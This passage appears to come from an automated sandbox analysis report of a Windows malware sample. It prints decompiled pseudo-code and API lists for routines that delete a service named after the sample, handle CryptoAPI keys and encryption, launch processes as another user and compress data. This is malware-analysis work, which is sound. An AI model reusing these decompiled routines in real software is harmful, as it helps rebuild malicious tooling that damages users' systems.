                  0x00403a2d
                  0x00403a32
                  0x00403a34
                  0x00403a34
                  0x00403a37
                  0x00403a3b
                  0x00403a3f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004039f9
                  0x004039f9
                  0x004039f9
                  0x004039ff
                  0x00403a04
                  0x00403a06
                  0x00403a06
                  0x00403a09
                  0x00403a0d
                  0x00403a11
                  0x00000000
                  0x004039f9
                  0x004038ed
                  0x004038f7
                  0x004038f7
                  0x00403903
                  0x00403905
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004038b5
                  0x004038b5
                  0x004038b5
                  0x004038bb
                  0x004038c0
                  0x004038c2
                  0x004038c2
                  0x004038c5
                  0x004038c9
                  0x004038cd
                  0x00000000
                  0x00403837
                  0x00403837
                  0x0040383c
                  0x0040383f
                  0x00403842
                  0x00403845
                  0x0040384a
                  0x00403869
                  0x00403869
                  0x00403871
                  0x00403874
                  0x00403874
                  0x00403877
                  0x0040387c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040387e
                  0x0040387e
                  0x0040387e
                  0x00403884
                  0x00403889
                  0x0040388b
                  0x0040388b
                  0x0040388e
                  0x00403892
                  0x00403896
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040384c
                  0x0040384c
                  0x0040384c
                  0x00403852
                  0x00403857
                  0x00403859
                  0x00403859
                  0x0040385c
                  0x00403860
                  0x00403864
                  0x00000000
                  0x0040384c
                  0x0040382f
                  0x004037ef

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$memcpy
                  • String ID: 0HCw$:G@
                  • API String ID: 368790112-2591896426
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: bff9ad06bf82d853f9c70daa61a207c77b125d2d5e3c741b47fcf7fead7e8f56
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 20023171601B108FC776CF29C680523BBF5BF55B227604A2EC6E796E91D23AF941CB08
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F6D0, Relevance: 7.6, APIs: 5, Instructions: 74servicestringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F6D0(void* __ecx) {
				short _v524;
				signed short* _t12;
				void* _t15;
				void* _t19;
				signed short _t21;
				short* _t24;
				signed int _t25;
				void* _t26;
				short* _t27;
				void* _t28;

				_t27 = 0;
				_t19 = __ecx;
				_t26 = 0;
				GetModuleFileNameW(0,  &_v524, 0x104);
				_t21 = _v524;
				_t12 =  &_v524;
				if(_t21 != 0) {
					_t25 = _t21 & 0x0000ffff;
					do {
						if(_t25 == 0x5c) {
							_t27 =  &(_t12[1]);
						}
						_t12 =  &(_t12[1]);
						_t25 =  *_t12 & 0x0000ffff;
					} while (_t25 != 0);
				}
				_t15 =  &(( &_v524)[lstrlenW( &_v524)]);
				while(_t15 >=  &_v524) {
					if( *_t15 == 0x2e) {
						_t26 = _t15;
					} else {
						_t15 = _t15 - 2;
						continue;
					}
					L11:
					if(_t27 != 0) {
						if(_t26 != 0) {
							 *_t26 = 0;
						}
						_t15 =  *_t27 & 0x0000ffff;
						_t24 = _t27;
						while(_t15 != 0) {
							if(_t15 >= 0x30 && _t15 <= 0x39) {
								_t24 =  &(_t24[1]);
								_t15 =  *_t24 & 0x0000ffff;
								continue;
							}
							goto L21;
						}
						_t15 = OpenServiceW(_t19, _t27, 0x10000);
						_t28 = _t15;
						if(_t28 != 0) {
							DeleteService(_t28);
							return CloseServiceHandle(_t28);
						}
					}
					L21:
					return _t15;
				}
				goto L11;
			}













                  0x0040f6e7
                  0x0040f6eb
                  0x0040f6ed
                  0x0040f6ef
                  0x0040f6f5
                  0x0040f6fc
                  0x0040f705
                  0x0040f707
                  0x0040f70a
                  0x0040f70e
                  0x0040f710
                  0x0040f710
                  0x0040f713
                  0x0040f716
                  0x0040f719
                  0x0040f70a
                  0x0040f731
                  0x0040f73f
                  0x0040f73a
                  0x0040f74b
                  0x0040f73c
                  0x0040f73c
                  0x00000000
                  0x0040f73c
                  0x0040f74d
                  0x0040f74f
                  0x0040f753
                  0x0040f757
                  0x0040f757
                  0x0040f75a
                  0x0040f75d
                  0x0040f773
                  0x0040f765
                  0x0040f76d
                  0x0040f770
                  0x00000000
                  0x0040f770
                  0x00000000
                  0x0040f765
                  0x0040f77f
                  0x0040f785
                  0x0040f789
                  0x0040f78c
                  0x00000000
                  0x0040f793
                  0x0040f789
                  0x0040f79f
                  0x0040f79f
                  0x0040f79f
                  0x00000000

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0040F6EF
                  • lstrlenW.KERNEL32(?), ref: 0040F725
                  • OpenServiceW.ADVAPI32(00000000,00000000,00010000), ref: 0040F77F
                  • DeleteService.ADVAPI32(00000000), ref: 0040F78C
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F793
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseDeleteFileHandleModuleNameOpenlstrlen
                  • String ID:
                  • API String ID: 1755434187-0
                  • Opcode ID: 8c6d03efe9b830c4f1bfd9f60f006d060f3a7d378c1f73d65c75a4cd1f519f25
                  • Instruction ID: 98483c91935e4ebaa86b3809d2fb255be3bc53819a93f085276952b5965563ee
                  • Opcode Fuzzy Hash: 8c6d03efe9b830c4f1bfd9f60f006d060f3a7d378c1f73d65c75a4cd1f519f25
                  • Instruction Fuzzy Hash: F4212B754012259ACB309F248C48AF77778DF44B56F40017BE985F7A90EB389E8AC79E
                  Uniqueness

                  Uniqueness Score: 1.01%

                  Function 00401FFC, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401F75: CryptAcquireContextW.ADVAPI32(00416510,00000000,00000000,00000018,F0000040,00000000,00000102,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401F8E
                    • Part of subcall function 00401F75: CryptImportKey.ADVAPI32(0040F111,?,00000000,00000000,00416514,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FD1
                    • Part of subcall function 00401F75: LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                    • Part of subcall function 00401F75: CryptReleaseContext.ADVAPI32(00000000,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FED
                  • CryptGenKey.ADVAPI32(0000660E,00000001,00416518,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402026
                  • CryptCreateHash.ADVAPI32(00008004,00000000,00000000,0041651C,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402044
                  • CryptDestroyKey.ADVAPI32(?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402058
                  • CryptDestroyKey.ADVAPI32(?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402064
                  • CryptReleaseContext.ADVAPI32(00000000,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402072
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$DestroyRelease$AcquireCreateFreeHashImportLocal
                  • String ID:
                  • API String ID: 4169801620-0
                  • Opcode ID: c10922a28de3b132bd60650c9f4fd97f46447a34fe901632b894f30011ec60e5
                  • Instruction ID: b801e2a3a967f12315dba04296e97bd271bf4fd4bc32c7350b1888b7b3c01b6c
                  • Opcode Fuzzy Hash: c10922a28de3b132bd60650c9f4fd97f46447a34fe901632b894f30011ec60e5
                  • Instruction Fuzzy Hash: B7F0BD703942057AEA212B31FD0AF963A63BB4470AF158435B611E40F8DFA6D651DE1C
                  Uniqueness

                  Uniqueness Score: 0.19%

                  Function 0040215A, Relevance: 6.1, APIs: 4, Instructions: 89encryptionCOMMON
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E0040215A(void* __ecx, intOrPtr* __edx, BYTE** _a4) {
				long* _v8;
				intOrPtr* _v12;
				intOrPtr _t17;
				void* _t20;
				BYTE* _t21;
				void* _t33;
				BYTE** _t35;
				void* _t51;
				BYTE* _t54;
				DWORD* _t56;

				_push(__ecx);
				_push(__ecx);
				_v12 = __edx;
				_t17 =  *((intOrPtr*)(__edx + 4));
				_t51 = 0;
				_t54 = _t17 - 0x74;
				if(_t17 >= 0x74) {
					_t19 =  !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54;
					__eflags = _t54 - ( !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54);
					if(_t54 != ( !=  ? (_t54 & 0xfffffff0) + 0x10 : _t54)) {
						goto L1;
					} else {
						_t35 = _a4;
						_t35[1] = _t54;
						_t21 = E004014F2(_t54);
						 *_t35 = _t21;
						if(_t21 != 0) {
							_v12 =  *_v12;
							_push( &_v8);
							_push(0);
							_push(0);
							_push( *0x41651c);
							if( *0x4133b4() == 0) {
								_t15 =  &(_t35[1]); // 0x406220
								_t56 = _t15;
								goto L10;
							} else {
								E0040151F( *_t35, _v12 + 0x74, _t54);
								_t10 =  &(_t35[1]); // 0x406220
								_t56 = _t10;
								if(CryptDecrypt( *0x416518, _v8, 1, 0,  *_t35, _t56) != 0) {
									 *0x412f04(_v8, _v12, 0x60,  *0x416514, 0, 0);
									_t33 = 1;
									_t51 =  !=  ? _t33 : 0;
								}
								 *0x413608(_v8);
								if(_t51 == 0) {
									L10:
									E00401532( *_t35);
									 *_t35 =  *_t35 & 0x00000000;
									 *_t56 =  *_t56 & 0x00000000;
								}
							}
						}
						_t20 = _t51;
					}
				} else {
					L1:
					_t20 = 0;
				}
				return _t20;
			}













                  0x0040215d
                  0x0040215e
                  0x00402162
                  0x00402166
                  0x00402169
                  0x0040216b
                  0x00402171
                  0x00402189
                  0x0040218c
                  0x0040218e
                  0x00000000
                  0x00402190
                  0x00402191
                  0x00402196
                  0x00402199
                  0x0040219e
                  0x004021a2
                  0x004021ad
                  0x004021b3
                  0x004021b4
                  0x004021b6
                  0x004021b8
                  0x004021c6
                  0x00402225
                  0x00402225
                  0x00000000
                  0x004021c8
                  0x004021d1
                  0x004021d7
                  0x004021d7
                  0x004021f4
                  0x00402208
                  0x00402212
                  0x00402213
                  0x00402213
                  0x00402219
                  0x00402221
                  0x00402228
                  0x0040222a
                  0x0040222f
                  0x00402232
                  0x00402232
                  0x00402221
                  0x004021c6
                  0x00402235
                  0x00402237
                  0x00402173
                  0x00402173
                  0x00402173
                  0x00402173
                  0x0040223d

                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,0040C894,00000104,0040C6FC,00000000,?,?,?,0040621C,0040C894), ref: 004021BE
                  • CryptDecrypt.ADVAPI32(0040C894,00000001,00000000,0040621C,00406220,?,?,?,0040621C,0040C894), ref: 004021EC
                  • CryptVerifySignatureW.ADVAPI32(0040C894,0040621C,00000060,00000000,00000000,?,?,?,0040621C,0040C894), ref: 00402208
                  • CryptDestroyHash.ADVAPI32(0040C894,?,?,?,0040621C,0040C894), ref: 00402219
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DecryptDestroyDuplicateSignatureVerify
                  • String ID:
                  • API String ID: 1014757615-0
                  • Opcode ID: 09569594b61da52c59d40f425788a8422af23cb8887ee059169b09b77780c7a0
                  • Instruction ID: 04f31bdf2388faa97c57a2fd3933937c900cc02f324019b7ba81707c3369ae23
                  • Opcode Fuzzy Hash: 09569594b61da52c59d40f425788a8422af23cb8887ee059169b09b77780c7a0
                  • Instruction Fuzzy Hash: A3318C31700110BFDB118F64DD44BAA7BBAEF88711F1040AAF901EB2E4DBB1AE019A59
                  Uniqueness

                  Uniqueness Score: 0.53%

                  Function 00401F75, Relevance: 6.0, APIs: 4, Instructions: 50encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptAcquireContextW.ADVAPI32(00416510,00000000,00000000,00000018,F0000040,00000000,00000102,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401F8E
                  • CryptImportKey.ADVAPI32(0040F111,?,00000000,00000000,00416514,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FD1
                  • LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                  • CryptReleaseContext.ADVAPI32(00000000,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FED
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$AcquireFreeImportLocalRelease
                  • String ID:
                  • API String ID: 3512700226-0
                  • Opcode ID: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction ID: 48002f7dd24f67e1fb8acd982fa0323bbb62263b5e85e9a59621982e2ad0c162
                  • Opcode Fuzzy Hash: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction Fuzzy Hash: 31018F31740244BBDB315BA2EC09FDB7E7DFB85B01F004179B604E21A0DBB19A10DBA8
                  Uniqueness

                  Uniqueness Score: 0.17%

                  Function 00401D2B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68processUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 44%
                  			E00401D2B(WCHAR* __edx, void* _a8, struct _PROCESS_INFORMATION* _a12) {
				WCHAR* _v8;
				struct _STARTUPINFOW _v76;
				intOrPtr _t19;
				int _t24;
				long _t33;
				void* _t34;
				int _t35;

				_t33 = 0x44;
				_t35 = 0;
				_v8 = 0;
				E00401503( &_v76, _t33);
				_v76.cb = _t33;
				_t34 = _a8;
				if(_t34 == 0) {
					_t35 = CreateProcessW(0, __edx, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a12);
				} else {
					_t19 = E00401A52(0x412090, 0xdb2fc54);
					_push(0);
					_v76.lpDesktop = _t19;
					_push(_t34);
					_push( &_v8);
					if( *0x4154a0() != 0) {
						_t24 = CreateProcessAsUserW(_t34, 0, __edx, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a12);
						_t35 = _t24;
						 *0x415564(_v8);
					}
					L00401B09(_v76.lpDesktop);
				}
				return _t35;
			}










                  0x00401d36
                  0x00401d3c
                  0x00401d40
                  0x00401d43
                  0x00401d48
                  0x00401d4b
                  0x00401d50
                  0x00401dc0
                  0x00401d52
                  0x00401d5c
                  0x00401d61
                  0x00401d62
                  0x00401d68
                  0x00401d69
                  0x00401d72
                  0x00401d8a
                  0x00401d93
                  0x00401d95
                  0x00401d95
                  0x00401d9e
                  0x00401d9e
                  0x00401dca

                  APIs
                  • CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,0040FBF6), ref: 00401D8A
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,0040FBF6), ref: 00401DBA
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateProcess$User
                  • String ID: M vu
                  • API String ID: 4042571897-696074975
                  • Opcode ID: e3f8796ccff0070e9350f972b6a419064f6187467af522590b0749c7ed7297d7
                  • Instruction ID: 8fb0d45fc8d51ab0f5bd0c7e4b9a4df30b4027125393a8a12e18b04e3b77fe86
                  • Opcode Fuzzy Hash: e3f8796ccff0070e9350f972b6a419064f6187467af522590b0749c7ed7297d7
                  • Instruction Fuzzy Hash: 64115E71A01228BBCB219B968C48DDFBFBDEF85764B144027F609A3250D6745D02C7A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040207B, Relevance: 4.6, APIs: 3, Instructions: 85encryptionCOMMON
                  Download Yara Rule
                  C-Code - Quality: 21%
                  			E0040207B(intOrPtr* __edx, signed int* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v16;
				signed int _v20;
				char _t26;
				signed int _t27;
				void* _t39;
				void* _t41;
				signed int _t42;
				intOrPtr _t49;
				intOrPtr _t56;
				signed int* _t58;
				void* _t59;

				_v12 = __edx;
				_t26 =  *((intOrPtr*)(__edx + 4));
				_t42 = _t26 + 1;
				if((_t42 & 0x0000000f) != 0) {
					_t42 = (_t42 & 0xfffffff0) + 0x10;
				}
				_t58 = _a4;
				_v16 = _t26;
				_t59 = 0;
				_t58[1] = _t42 + 0x74;
				_t27 = E004014F2(_t42 + 0x74);
				_v20 = _t27;
				 *_t58 = _t27;
				if(_t27 == 0) {
					L9:
					return _t59;
				} else {
					_v8 = _t27 + 0x74;
					_push( &_a4);
					_push(0);
					_push(0);
					_push( *0x41651c);
					if( *0x4133b4() == 0) {
						L8:
						E00401532( *_t58);
						 *_t58 =  *_t58 & 0x00000000;
						_t58[1] = _t58[1] & 0x00000000;
						goto L9;
					}
					E0040151F(_v8,  *_v12,  *((intOrPtr*)(_v12 + 4)));
					_push(_t42);
					_push( &_v16);
					_push(_v8);
					_push(0);
					_push(1);
					_push(_a4);
					_push( *0x416518);
					if( *0x413124() != 0) {
						_t43 = _v20;
						_t56 =  *0x416518; // 0x0
						_t49 =  *0x416514; // 0x0
						_t39 = E00401F11(_t49, _t56, _v20);
						_pop(_t50);
						if(_t39 != 0) {
							E00401F56(_a4, _t43 + 0x60);
							_t41 = 1;
							_t59 =  !=  ? _t41 : 0;
						}
					}
					 *0x413608(_a4);
					if(_t59 != 0) {
						goto L9;
					} else {
						goto L8;
					}
				}
			}
















                  0x00402083
                  0x00402088
                  0x0040208c
                  0x00402092
                  0x00402097
                  0x00402097
                  0x0040209a
                  0x004020a0
                  0x004020a3
                  0x004020a5
                  0x004020a8
                  0x004020ad
                  0x004020b0
                  0x004020b4
                  0x00402152
                  0x00402159
                  0x004020ba
                  0x004020bd
                  0x004020c3
                  0x004020c4
                  0x004020c5
                  0x004020c6
                  0x004020d4
                  0x00402143
                  0x00402145
                  0x0040214a
                  0x0040214d
                  0x00000000
                  0x0040214d
                  0x004020e1
                  0x004020e7
                  0x004020eb
                  0x004020ec
                  0x004020f1
                  0x004020f3
                  0x004020f4
                  0x004020f7
                  0x00402105
                  0x00402107
                  0x0040210a
                  0x00402110
                  0x00402117
                  0x0040211c
                  0x0040211f
                  0x00402128
                  0x00402132
                  0x00402133
                  0x00402133
                  0x0040211f
                  0x00402139
                  0x00402141
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402141

                  APIs
                  • CryptDuplicateHash.ADVAPI32(00000000,00000000,00000000,0040C6FC,00000000,00000104,0040616B,?,00000000,000CD140), ref: 004020CC
                  • CryptEncrypt.ADVAPI32(?,00000001,00000000,?,?,?), ref: 004020FD
                  • CryptDestroyHash.ADVAPI32(?), ref: 00402139
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Hash$DestroyDuplicateEncrypt
                  • String ID:
                  • API String ID: 1128268866-0
                  • Opcode ID: 4e59cee7960c38e8b5ee7e5856dafefdb3e81cdfc3becf9d1b757b82fba9955f
                  • Instruction ID: e215d4e7104d4b47444e5095201a7053bbba18aa046f11bf0f453833bd48b0d0
                  • Opcode Fuzzy Hash: 4e59cee7960c38e8b5ee7e5856dafefdb3e81cdfc3becf9d1b757b82fba9955f
                  • Instruction Fuzzy Hash: 3E21A271A00206BFDB10DF64DD44AAABBB9FF04354B10817AE905DB2A1EB74DE40CB94
                  Uniqueness

                  Uniqueness Score: 0.65%

                  Function 00401F11, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptExportKey.ADVAPI32(00000000,00000000,00000001,00000040,?,?,00000000), ref: 00401F2F
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptExport
                  • String ID: l
                  • API String ID: 3389274496-2517025534
                  • Opcode ID: 3ca03c0b0af9f491b2816fad542ac85e238e487dba8f6d51c2e98b0d322ebe00
                  • Instruction ID: 8de1b0b566f387a962e970ad356d4eae64fe2c0c17b5e81973823825b819e613
                  • Opcode Fuzzy Hash: 3ca03c0b0af9f491b2816fad542ac85e238e487dba8f6d51c2e98b0d322ebe00
                  • Instruction Fuzzy Hash: 83F02730900218ABDB10DF64CC44EFEBBBDDB05B44F1001AAED05E7280E6709E0487E4
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 00401F56, Relevance: 1.5, APIs: 1, Instructions: 14encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000), ref: 00401F6B
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptHashParam
                  • String ID:
                  • API String ID: 1839025277-0
                  • Opcode ID: 496b6ce24351a1596fbace5237037a10789b3b74501e142722ab8e206ca54b84
                  • Instruction ID: ea0d1c88b8beea22a5d58a2278bf81109cad106d3917202b53e93bae8ff64b58
                  • Opcode Fuzzy Hash: 496b6ce24351a1596fbace5237037a10789b3b74501e142722ab8e206ca54b84
                  • Instruction Fuzzy Hash: BAC012B055020CBFE614CB40DD0AFBAB7ACD744B05F404198BD0462281E6B15E0055B1
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 0040436D, Relevance: .3, Instructions: 303COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040436D(intOrPtr* __ecx) {
				char _v5;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _t155;
				signed int _t161;
				void* _t167;
				signed int _t178;
				void* _t189;
				signed int _t192;
				signed int _t203;
				signed char _t213;
				signed int _t217;
				signed char _t219;
				signed int _t220;
				intOrPtr _t224;
				intOrPtr _t226;
				signed int _t228;
				signed int _t231;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t243;
				intOrPtr _t244;
				signed int _t250;
				intOrPtr* _t253;
				intOrPtr* _t257;
				intOrPtr _t258;
				signed int _t260;
				signed int _t264;
				signed int _t267;
				intOrPtr* _t274;
				intOrPtr _t275;
				void* _t276;
				signed int _t277;
				signed int _t279;
				signed int _t281;
				void* _t283;

				_t274 = __ecx;
				_t257 =  *((intOrPtr*)(__ecx + 0x84));
				_t275 =  *((intOrPtr*)(__ecx + 0x88));
				_t155 =  *((intOrPtr*)(__ecx + 0x80));
				_v16 = _t257;
				_v12 = _t275;
				_v24 = _t155;
				L2:
				while(_t275 != 0 || _t155 != 0 &&  *((intOrPtr*)(_t274 + 0x20)) != _t275) {
					_t224 =  *((intOrPtr*)(_t274 + 0x20));
					if( *((intOrPtr*)(_t274 + 0x24)) + _t224 < 2) {
						while(_t275 != 0) {
							if( *((intOrPtr*)(_t274 + 0x20)) >= 0x102) {
								L12:
								_t258 =  *((intOrPtr*)(_t274 + 0x20));
								_t226 =  <  ? 0x8000 - _t258 :  *((intOrPtr*)(_t274 + 0x24));
								 *((intOrPtr*)(_t274 + 0x24)) = _t226;
								if(_v24 != 0 || _t258 >= 0x102) {
									_t217 = 0;
									_t276 = 2;
									_t277 =  !=  ?  *(_t274 + 0x50) : _t276;
									_t161 =  *(_t274 + 0x1c) & 0x00007fff;
									_v28 = 1;
									_v32 = 0;
									_v36 = _t277;
									_v20 = _t161;
									if(( *(_t274 + 8) & 0x00090000) == 0) {
										E00403C52( &_v32, _t274,  *(_t274 + 0x1c), _t226, _t258,  &_v32,  &_v36);
										_t217 = _v32;
										_t283 = _t283 + 0x10;
										_t277 = _v36;
										_t228 = _v20;
										L32:
										if(_t277 != 3 || _t217 < 0x2000) {
											L34:
											if(_t228 == _t217 || ( *(_t274 + 8) & 0x00020000) != 0 && _t277 <= 5) {
												goto L37;
											} else {
												goto L38;
											}
										} else {
											L37:
											_t277 = 0;
											_t217 = 0;
											L38:
											_t260 =  *(_t274 + 0x50);
											if(_t260 == 0) {
												if(_t217 != 0) {
													if( *((intOrPtr*)(_t274 + 0x14)) != 0 || ( *(_t274 + 8) & 0x00010000) != 0 || _t277 >= 0x80) {
														E004042D4(_t274, _t277, _t217);
														L53:
														_t231 = _t277;
														goto L54;
													} else {
														_t178 =  <  ? _t228 : 0x8100;
														L51:
														 *(_t274 + 0x54) =  *(_t178 + _t274 + 0x90) & 0x000000ff;
														 *((intOrPtr*)(_t274 + 0x4c)) = _t217;
														 *(_t274 + 0x50) = _t277;
														L46:
														_t231 = _v28;
														L54:
														 *(_t274 + 0x1c) =  *(_t274 + 0x1c) + _t231;
														 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) - _t231;
														_t167 =  *((intOrPtr*)(_t274 + 0x24)) + _t231;
														_t233 =  <  ? _t167 : 0x8000;
														 *((intOrPtr*)(_t274 + 0x24)) =  <  ? _t167 : 0x8000;
														_t234 =  *((intOrPtr*)(_t274 + 0x28));
														if(_t234 > _t274 + 0x1926a) {
															L58:
															_t275 = _v12;
															 *((intOrPtr*)(_t274 + 0x84)) = _v16;
															 *((intOrPtr*)(_t274 + 0x88)) = _t275;
															_t236 = E004037A9(_t274, 0);
															if(_t236 != 0) {
																return 0 | _t236 > 0x00000000;
															}
															_t155 = _v24;
															L1:
															_t257 = _v16;
															goto L2;
														}
														_t275 = _v12;
														_t155 = _v24;
														if( *((intOrPtr*)(_t274 + 0x3c)) <= 0x7c00) {
															goto L1;
														}
														if((_t234 - _t274 - 0x9272) * 0x73 >> 7 >=  *((intOrPtr*)(_t274 + 0x3c))) {
															goto L58;
														}
														_t155 = _v24;
														if(( *(_t274 + 8) & 0x00080000) == 0) {
															goto L1;
														}
														goto L58;
													}
												}
												_t181 =  <  ? _t228 : 0x8100;
												E004042A2(_t274,  *((intOrPtr*)(( <  ? _t228 : 0x8100) + _t274 + 0x90)));
												goto L46;
											}
											_t240 = _t274;
											if(_t277 <= _t260) {
												E004042D4(_t240, _t260,  *((intOrPtr*)(_t274 + 0x4c)));
												_t231 =  *(_t274 + 0x50) - 1;
												 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
												goto L54;
											}
											E004042A2(_t240,  *(_t274 + 0x54));
											if(_t277 < 0x80) {
												_t178 = _v20;
												goto L51;
											}
											E004042D4(_t240, _t277, _t217);
											 *(_t274 + 0x50) =  *(_t274 + 0x50) & 0x00000000;
											goto L53;
										}
									}
									_t228 = _t161;
									if(_t226 != 0 && ( *(_t274 + 8) & 0x00080000) == 0) {
										_t277 = 0;
										_v5 =  *((intOrPtr*)((_t228 - 0x00000001 & 0x00007fff) + _t274 + 0x90));
										if(_t258 == 0) {
											L30:
											_t277 = 0;
											goto L34;
										}
										_t189 = _t228 + _t274;
										_t243 = _v5;
										while( *((intOrPtr*)(_t189 + _t277 + 0x90)) == _t243) {
											_t277 = _t277 + 1;
											if(_t277 < _t258) {
												continue;
											}
											break;
										}
										_t228 = _v20;
										if(_t277 < 3) {
											goto L30;
										}
										_t217 = 1;
									}
									goto L32;
								} else {
									_t257 = _v16;
									goto L61;
								}
							}
							_t219 =  *_t257;
							_t192 =  *(_t274 + 0x1c) +  *((intOrPtr*)(_t274 + 0x20)) & 0x00007fff;
							_t257 = _t257 + 1;
							_t275 = _t275 - 1;
							_v16 = _t257;
							_v12 = _t275;
							 *(_t192 + _t274 + 0x90) = _t219;
							if(_t192 < 0x101) {
								 *(_t192 + _t274 + 0x8090) = _t219;
							}
							 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) + 1;
							_t244 =  *((intOrPtr*)(_t274 + 0x20));
							if( *((intOrPtr*)(_t274 + 0x24)) + _t244 >= 3) {
								_t279 =  *(_t274 + 0x1c) + _t244 + 0xfffffffd;
								_t264 = _t279 & 0x00007fff;
